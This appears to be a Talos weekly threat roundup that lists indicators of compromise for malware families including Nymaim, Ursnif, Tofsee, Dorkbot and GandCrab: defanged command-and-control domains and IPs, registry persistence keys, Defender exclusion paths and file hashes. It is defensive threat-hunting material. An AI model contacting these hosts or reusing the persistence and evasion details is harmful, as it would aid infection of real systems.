                  SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
                  MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
                  Typical Filename: sayext.gif
                  Claimed Product: N/A
                  Detection Name: W32.093CC39350-100.SBX.TG 

                  Threat Roundup for August 30 to September 6

                  $
                  0
                  0
                  Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 30 and Sept. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                  As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                  For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                  The most prevalent threats highlighted in this roundup are:
                  Threat NameTypeDescription
                  Win.Malware.Nymaim-7149347-1 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
                  Win.Malware.Ursnif-7149254-1 Malware Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
                  Win.Malware.Kuluoz-7149209-1 Malware Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
                  Win.Dropper.Tofsee-7147648-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
                  Win.Trojan.Dorkbot-7146944-0 Trojan Dorkbot is a worm that spreads itself through social networking sites and messaging apps. Once installed, the infected computer becomes part of a botnet, allowing the controller to control the machine remotely.
                  Win.Ransomware.Gandcrab-7145847-0 Ransomware GandCrab is ransomware that encrypts documents, photos, databases and other important files typically using the file extension ".GDCB," ".CRAB" or ".KRAB." GandCrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and GrandSoft.
                  Win.Malware.Phorpiex-7145044-1 Malware Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, including malware that sends spam emails, ransomware and cryptocurrency miners.
                  Win.Ransomware.Sage-7144073-1 Ransomware Sage ransomware encrypts files and then demands a payment for the files to be recovered. Sage typically spreads via malicious email attachments, and the encrypted file extensions vary.

                  Threat Breakdown

                  Win.Malware.Nymaim-7149347-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\GOCFK 16
                  <HKCU>\SOFTWARE\MICROSOFT\KPQL 16
                  <HKCU>\SOFTWARE\MICROSOFT\GOCFK
                  Value Name: mbijg
                  16
                  <HKCU>\SOFTWARE\MICROSOFT\KPQL
                  Value Name: efp
                  16
                  MutexesOccurrences
                  Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}16
                  Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}16
                  Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}16
                  Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}16
                  Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}16
                  Local\{0F53A50D-AEA8-402A-580B-3C32A490301E}16
                  Local\{42FDAA48-39A4-4464-9CC4-6F1A48111B12}16
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  gokxyba[.]net15
                  bkigzfz[.]com15
                  UPOEPRPAA[.]NET15
                  WJXVRSFRYJQ[.]PW15
                  gfjtjjgx[.]pw15
                  YZOBVXEI[.]NET15
                  DZLYHSMMLUL[.]PW15
                  EMKWQU[.]PW15
                  TQTZRZKIIID[.]COM15
                  MJWHLRF[.]NET15
                  tbblpqejav[.]pw13
                  fseqigbfr[.]in13
                  pscjvmzmy[.]in13
                  scvkmktqksu[.]pw13
                  ibypya[.]in13
                  hkfyto[.]pw13
                  qvrghscpr[.]in13
                  sbuhudow[.]pw13
                  yqofd[.]in13
                  luwjudefo[.]net13
                  uqzbwfz[.]net13
                  oangztra[.]com13
                  qanefmpvo[.]net13
                  chtugnzdw[.]com13
                  jcggrdthx[.]net13
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  %ProgramData%\ph16
                  %ProgramData%\ph\eqdw.dbc16
                  %ProgramData%\ph\fktiipx.ftf16
                  %TEMP%\gocf.ksv16
                  %TEMP%\kpqlnn.iuy16
                  %TEMP%\fro.dfx13
                  %TEMP%\npsosm.pan13
                  \Documents and Settings\All Users\pxs\dvf.evp13
                  \Documents and Settings\All Users\pxs\pil.ohu13

                  File Hashes

                  037d05e6a51414ff22c6f27f5758bab12a237fae5a8da61b3d9579e77cf68cc9 04f91d0532ceec2b0455ab9745dff5b423f34e8f32cee261db68ad28db024a08 123573d7840dccbc368911be620c2c839fcb81642abeaed5a67316c003bb67a4 2f485d4cf77a8079c75d584aed08d769b864ba76373250e583b7268a444fc2b4 6f7ef5eaa16f360e0ce570fe2196bc91ee133cb954a1d62ff9d4a72a1f0e2c45 78838c78442dd1afb4d1806e0eb81ddb4931a1f51dd021a24109a461105232c0 79158026c4d06723c530813c1e2a90024e88dddac9aa84cf0314f004eb49062c 792daabd16b1ceb49a85bccc8cdd8fcf8c21a9a0df3eb909e06df9cd81f786c7 7a06a8e0fc5ee2416369f3638bb42a7b4994fd2e74b89b6a533636de6f8a4a86 7c8ff85a4e95716c990a60b5f5a5992c0fe530e7a366f80bafbc6621ffff0fbb ac1887855401066432456e2890c97b7b303e08b7b65e20a8fd004052175a5b18 c19036fc9959e2003d48bb68b2cd6c95a6423b6fa7a434c7ce96d77d69c6e532 c1d686b25508f66fd32aaaeb1caccf0fd233f5303418a3658088205f543182a3 ca3a1e4d93207501cd2911bf88a92431ec5ef877b7b1a7200072c976339a07ae fc5b7ae3747c98d4658a0599130d5374c71bf2aa88483fab28d2e643e6283164 fcccfc04baab2622fbc4cf0ee2f47bd9eeb53e98a57a9754286805c0580ff79f

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Malware.Ursnif-7149254-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: api-PQEC
                  10
                  <HKCU>\SOFTWARE\MICROSOFT\IAM
                  Value Name: Server ID
                  10
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 10
                  <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 10
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: Client
                  10
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
                  10
                  <HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
                  Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
                  10
                  <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
                  Value Name: PendingFileRenameOperations
                  10
                  MutexesOccurrences
                  Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}10
                  Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}10
                  Local\{B1443895-5CF6-0B1E-EE75-506F02798413}10
                  {A7AAF118-DA27-71D5-1CCB-AE35102FC239}10
                  {C3863B40-467D-ED33-68A7-DA711CCBAE35}10
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  208[.]67[.]222[.]22210
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  resolver1[.]opendns[.]com10
                  222[.]222[.]67[.]208[.]in-addr[.]arpa10
                  myip[.]opendns[.]com10
                  jiauwnehbtqiwjeqwe[.]net10
                  Files and or directories createdOccurrences
                  \{4BC230AC-2EB3-B560-90AF-42B9C45396FD}10
                  %APPDATA%\Microsoft\Dmlogpui10
                  %APPDATA%\Microsoft\Dmlogpui\datat3hc.exe10
                  %TEMP%\<random, matching [A-F0-9]{4}>.bi19
                  %TEMP%\8A4.bi11

                  File Hashes

                  055f5a38fca8e55adb9e46bfc7dfe3b9094ad659bb473553881b0c72cc580120 2a88b621e291815db268dd8a9e95f2fbff5b2216358ed24eab198917fe65742b 3b306bbe5aaabdd008259ac755b50ac5c53144bd2f79b90d1f29c3c576172661 7cbc76561f75ead55fd3a776ba7b44d253783da767f4fb20b09616fa1039ac8b b2939cb18525d202ec9af8629b4ba0aaaab24e7b81bd5abd00fbb69d34a1dea5 c23a3dcbe61fb4877322c6f0e24476d9fd433ca013f62cc9f42a9cb62acf02f1 cd83db4c5a03f1fae1fa4183e70ea6a6acfc0657e45fbecabc48adfb281f39fe cf10ee7467a9ee13fe44e9ea9c2833dde4c5270909a75c5fd8b3ec3627a17af5 d257e0242bc63f343d6712fe05e5b8c9d9be84645e5a2063a1d12820aae450fa fb1eac4151a47e030a0d372c40fc3c70cd4ba76bc40571fa69d60f398196726a

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Win.Malware.Kuluoz-7149209-1

                  Indicators of Compromise

                  MutexesOccurrences
                  2GVWNQJz1188
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  87[.]106[.]4[.]78129
                  95[.]141[.]29[.]195128
                  50[.]57[.]99[.]160126
                  188[.]116[.]23[.]96119
                  178[.]33[.]227[.]11114
                  91[.]227[.]26[.]178114
                  78[.]46[.]92[.]70110
                  91[.]220[.]215[.]29105
                  Files and or directories createdOccurrences
                  %LOCALAPPDATA%\etxaxetj.exe1
                  %LOCALAPPDATA%\eopjtjwg.exe1
                  %LOCALAPPDATA%\tfugpetb.exe1
                  %LOCALAPPDATA%\tjdsucos.exe1
                  %LOCALAPPDATA%\uxfuuarq.exe1
                  %LOCALAPPDATA%\lspsvmef.exe1
                  %LOCALAPPDATA%\addakgil.exe1
                  %LOCALAPPDATA%\gdsfuent.exe1
                  %LOCALAPPDATA%\kesjxiuw.exe1
                  %LOCALAPPDATA%\rvdhhicw.exe1
                  %LOCALAPPDATA%\odjotitr.exe1
                  %LOCALAPPDATA%\apferdrh.exe1
                  %LOCALAPPDATA%\mxdmpmxp.exe1
                  %LOCALAPPDATA%\jujldfjk.exe1
                  %LOCALAPPDATA%\lwmwmfsv.exe1
                  %LOCALAPPDATA%\sauuvxpt.exe1
                  %LOCALAPPDATA%\rvrsnrcv.exe1
                  %LOCALAPPDATA%\libwmqqa.exe1
                  %LOCALAPPDATA%\sfvadtvv.exe1
                  %LOCALAPPDATA%\cswmofrn.exe1
                  %LOCALAPPDATA%\hngjmrve.exe1
                  %LOCALAPPDATA%\jkqgumia.exe1
                  %LOCALAPPDATA%\cqeelolf.exe1
                  %LOCALAPPDATA%\ipatebes.exe1
                  %LOCALAPPDATA%\xmcejvax.exe1
                  *See JSON for more IOCs

                  File Hashes

                  01412a2d6877375f88d6b502600e45a26197396a1f0b019d8d10437729f52257 02205537e0ac5c8b8b66f53e8d2993b706a8f7fa5757346a7312db646a471143 0364c9b75b03b9ed56059c9bea7f8a8f81f13d2cfc061c0b6e13525dcc3bd7dd 0383d381bf8f010ebfe0215528a7289429052487a2fe90ce35eae0f7f11e1fea 05fa1a824e573e2db9dfbf4e3358a5f2c88956ae6a669f6336c42812a67a524f 06de3f442bfeee18831cebef86194b8166a188af312b739fb628c203e4d5f2ea 078e7fba23d21250e959935ba3ab9559dddad02240443543616eab37547ddd86 07b13ab67c36b30dc081deebdd0bc5a9319a3ddf05e17a5d4552c16ded433d4e 087d4788799c0e935673ef2572bebf8f86ca61e8966b2404e20432a417e73894 0909060506cdf2d77307b2ae36380fc7f85de0a9c1c103ca629d3089ba507df3 091b1cb41a31ffd75781295ec748bb6b82bc6624dd7853405304a08a322c51ec 0a482d15c908dd7b8936e0900fcabef622708b79cd2020c730376aec9c7ca388 0c04b5f60896203a5d39a707080f344d27aa39048f171e9284d6d8b665e226e5 0c86168150197d12329c57ad9c8d616a15f285483ba3cec4a9bb4ede46e4d234 0ce022144a2b3d712579d8a63c9c73109ac74eff4ad68f1b6fbd8f593c706aa6 0ce6ae758bdc6f4c44b249f4ecf327f5a00a238ebed3bbe8b06f317b91335f1c 0d3ce20b680e2dbf203a10e9c8ed97c4f7006be9b3a6fddbeb443937480d98b5 0de776cb80503f7daa3effefbb2739f9c927f028df4445fa051cb33377de359f 109a6498f4d7b51f0ede104d4bd8f78782913d641147930e07c6dc236dc04a94 126266edb2a41407ba26f72e127430dd5932b07ab2e312dfd09285bc9f5db40b 12e80c62f20986a8abe96df7be0c1b91d5fd32bef9781bf669d7a5d538af778c 13705e3f984dc79824e22fa9349c3704dbe5d67a606f59029622887379eeb302 14e13631f15fc311ef20c9e87ef28675dc14cd83ed871f44266811e103b45284 15381012927b9852633c0943aab2d0522dbf3d3d0a326e4b0e18e21ba29f6065 168c0dd6882307664579943b5786594e94435ccab43618aee5b04d6f974bda2c
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Win.Dropper.Tofsee-7147648-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config3
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Type
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Start
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: ErrorControl
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: DisplayName
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: WOW64
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: ObjectName
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: Description
                  13
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config0
                  13
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config1
                  13
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES
                  Value Name: Config2
                  13
                  <HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
                  Value Name: ImagePath
                  12
                  <HKU>\.DEFAULT\CONTROL PANEL\BUSES 7
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\jcqwvdjy
                  2
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\unbhgouj
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\nguazhnc
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\zsgmltzo
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\yrflksyn
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\dwkqpxds
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\rkyedlrg
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\vocihpvk
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\fymsrzfu
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\mftzygmb
                  1
                  <HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
                  Value Name: C:\Windows\SysWOW64\xqekjrxm
                  1
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  239[.]255[.]255[.]25013
                  69[.]55[.]5[.]25013
                  172[.]217[.]3[.]10013
                  46[.]4[.]52[.]10913
                  176[.]111[.]49[.]4313
                  85[.]25[.]119[.]2513
                  144[.]76[.]199[.]213
                  144[.]76[.]199[.]4313
                  43[.]231[.]4[.]713
                  192[.]0[.]47[.]5913
                  95[.]181[.]178[.]1713
                  172[.]217[.]197[.]2713
                  67[.]195[.]228[.]11112
                  172[.]217[.]10[.]22711
                  64[.]233[.]186[.]2711
                  23[.]160[.]0[.]10810
                  172[.]217[.]5[.]22810
                  168[.]95[.]5[.]11710
                  188[.]125[.]72[.]7310
                  209[.]85[.]203[.]2710
                  213[.]209[.]1[.]1299
                  216[.]146[.]35[.]359
                  77[.]75[.]78[.]429
                  77[.]75[.]76[.]429
                  98[.]136[.]96[.]749
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  250[.]5[.]55[.]69[.]in-addr[.]arpa13
                  250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org13
                  250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org13
                  250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net13
                  whois[.]iana[.]org13
                  250[.]5[.]55[.]69[.]bl[.]spamcop[.]net13
                  whois[.]arin[.]net13
                  250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org13
                  microsoft-com[.]mail[.]protection[.]outlook[.]com13
                  honeypus[.]rusladies[.]cn13
                  marina99[.]ruladies[.]cn13
                  sexual-pattern3[.]com13
                  coolsex-finders5[.]com13
                  super-efectindating2[.]com13
                  mta5[.]am0[.]yahoodns[.]net12
                  hotmail-com[.]olc[.]protection[.]outlook[.]com11
                  www[.]google[.]co[.]uk11
                  mx-eu[.]mail[.]am0[.]yahoodns[.]net10
                  video-weaver[.]fra02[.]hls[.]ttvnw[.]net10
                  smtp-in[.]libero[.]it9
                  libero[.]it9
                  eur[.]olc[.]protection[.]outlook[.]com9
                  tiscali[.]it9
                  etb-1[.]mail[.]tiscali[.]it9
                  www[.]ebay[.]com9
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  %SystemRoot%\SysWOW64\config\systemprofile13
                  %TEMP%\<random, matching '[a-z]{8}'>.exe13
                  %SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>12
                  %System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)10
                  %SystemRoot%\SysWOW64\config\systemprofile:.repos7
                  %TEMP%\tsielhm.exe1

                  File Hashes

                  07cbb12e22655ae68bae25e8aedee6bea64d0d430d77afb86227758740b1dfcd 1ef2f6a958ffc7e4c2733100f10b53baec777d197d345012d464c2e9987cdd43 461f7cb0c6be901935666279cc26d155df22ddffbd4d65372b6ffe9aa3f4ff31 4b57c99f86103e7b26c7bee052f5c5c92c6ac82c34f21ac1b8aa333887a51068 4f734c7197b0c73e62e042cdef1cb4dfb056bc5e144a44ec00f8239796b203a9 564e5e2f864ce52b923daf130c30efd97ba3eab872e04cc8849ed6133ed7abe8 69a09f081ee022239d1b11214da3f6cfc4c256c91c61f806faa71d1997ca31d9 a0738035727d477bae527df884eb986a9c8e6aea75a354782038e3840b6fa3af a2a94ca3039111688fe1304a3fd4ad245b79d0b6d2ce58bcecdcfdb1b34c0208 ad601c1a9bc018b918cbc9eb6c4ccd625f9096c01115a2eb4a7c1387f2bf1d10 afc2ab3eb8b9a23623603c03e7b7d1f0fca18b7b64f33976dd102681eb2a217a b1f1d675c5d97b3ecf4085f1326bf67e5b1ee0b30ed1499df1552283d5fde731 b2ba1ec34c107072d07a962d8ce3fbaefe195969c03be6a3d0dda19aef4665a2

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Trojan.Dorkbot-7146944-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Znawav
                  25
                  MutexesOccurrences
                  hex-Mutex25
                  s5rBKCUVfOF8JLVi25
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  204[.]79[.]197[.]20025
                  13[.]107[.]21[.]20015
                  212[.]83[.]168[.]19613
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  api[.]wipmania[.]com13
                  update[.]jebac[.]net13
                  Files and or directories createdOccurrences
                  %APPDATA%\Znawav.exe25
                  %APPDATA%\Pwoiox.exe13

                  File Hashes

                  1b7787bd1726468e25ab200665e57b1b470b7ba531d60cee8642646443725cf8 1f2f1041c73af88cc46eb86719cf66e3b51da1c4d7ac70a80cc5b6e7ee4ad73a 20f7f4a0bd9e9e531df4c14276eb290f5cb7efc37156ec9ba46fa2a7891206f1 31012f9ba68cf7e8ac73561fee2c8b2e2a538196d264f3d4c3d89341e77e2495 33f4666ed81d7e61ccdae3a895aa21d670b714727ae68639aeb064f58e387744 39a3a1ccf3c4f36cc72bd45985058d31b02ee345fc844be3b94da5a4c5a03bb6 3d8aa371276f3f11f2640c559dc5edbc792f8126604cb0e8d0ac3c7e521d4f24 4388646391e39334c69e5ff223f0a17d8f3dd11e34921344a30f78772550ca03 4fcf9f3dcd2df360e1069126acd734ded1b43ea7a7dbb5912db0d23eea505bc9 53d77cbc31d6ada99bd858417c8a8ec67907a82e6bc20e8641a3f71cbcfbe4f3 642106449fb781a3f5de12b52b54c97961e61f76160ef8c169bd2b0615e98a2c 738a68fc7864cd87bfaa8336f87b8cdc888fe9fb918de29114b419e2944d29dc 791b43d7009c8bceb849274e51607d89283bddfa94d215ede8cc3bc76953f7a7 a2c072ec77e1736120ff202bfd7f23495921f04375e09fcedc43be1e61ce4a18 a4f42f84cb704690aa10a2ebdce33e964b67a57cee554019d33f1a7cd9d3f4f3 b5bc85bf00d89cc18ffd0749f4783e5c4dd855fa37ce6c37a97ac6e8aa0a10e7 bf1102d0fb6cff725e38c7a6f6ca0e538aebcc546b711f9a2d5fac84fdb981f4 cb95aedf7037adb0c4d756ca1ddb3038341ca20cb276156b782726eff3dfca99 def2ba6dc7842c6b35f09283b68aaa9558e7339ba4b4aa53da83bfed57188ecd e5cbafb8ceee5d6573f199acdff34ab85d2dcd0d0d8e4eb34bd1afed33fe405a ea0479b081905b195d7dc9f37f81cd07945691ab84b395013e2653594e40522e ee10cd27e27378d4ad3f6122168c3e60270031b337e90683481c061d192401f7 ef4abe8f4692c99b8d9bdc30b458d830905e6149ae1ae50bf7eb494f0c8bd229 f31763a353bf7a525e14f500f70c1924948db63d0bde94567dd908917f69133f f71e42635ad5e9c0edac076a736ee15dd705ee119e2d485cb27db7c203bd0e0b

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella


                  Win.Ransomware.Gandcrab-7145847-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: pmoywyfxuah
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: timdnedsfpy
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: gygyxbzlyev
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: faopdrnwmix
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: zpkiquyxsdb
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: lqerbrodiev
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: hspjekelvqt
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: mmdbduldnwd
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: rwsrrtanpih
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: ukyzgbixnjn
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: bnsxxppkywd
                  1
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
                  Value Name: wuanhvperbe
                  1
                  MutexesOccurrences
                  Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c12
                  \BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e410
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  66[.]171[.]248[.]17812
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  ipv4bot[.]whatismyipaddress[.]com12
                  ns1[.]wowservers[.]ru12
                  carder[.]bit12
                  1[.]1[.]168[.]192[.]in-addr[.]arpa12
                  ransomware[.]bit12
                  ns2[.]wowservers[.]ru12
                  1[.]0[.]168[.]192[.]in-addr[.]arpa10
                  Files and or directories createdOccurrences
                  %APPDATA%\Microsoft\<random, matching '[a-z]{6}'>.exe12

                  File Hashes

                  067cdd8df478938f229dcedc5f65fd4cf92c66d3c516ba60ae4355d5cfd06a4b 2d6a8bbf44f9459a31692b826a86be3ec55a2fae943b01f1dbfe78bf033ff7ed 32c22604944c7f284fdd4495613bb7d0f7cf274677df9f2d4fb2c38369dba438 4135c6461d7866f9b1841bc7ecbc3e4ff58681e2b80f79e9a7daade0ca014678 72ca8e7098802482b51ba77305cb22d52180444ff2925ed20d8eb1ca0dac5c56 7deada88e32db501dfcfb1aa0b9328c94b8a92561477d01e6b1a3b74e092e56f a10f24291658cec5c7674d2a0a28ce019a69db9af92f3ce8b5b5a8c01c166e5f a2f4c15b34be976d49f35e8363e220f88d59e17ab056b9049d872c6eec04f27f b2526566d9c11b59d36b80c035653ec56a23c5aac8c49c6d7ce3657441e357b2 d2ec413f2c120332e05f71f899094794a9c0092b220ef86633d499bcdcf997ee f8a6408e3a5a75772246c8dba4a39311ef82a5c5e5445fd817375610606bac66 f8d8c881aa3b875216dff9aad38648fe95ad99ee53b3b6652d3172187eded48f

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP

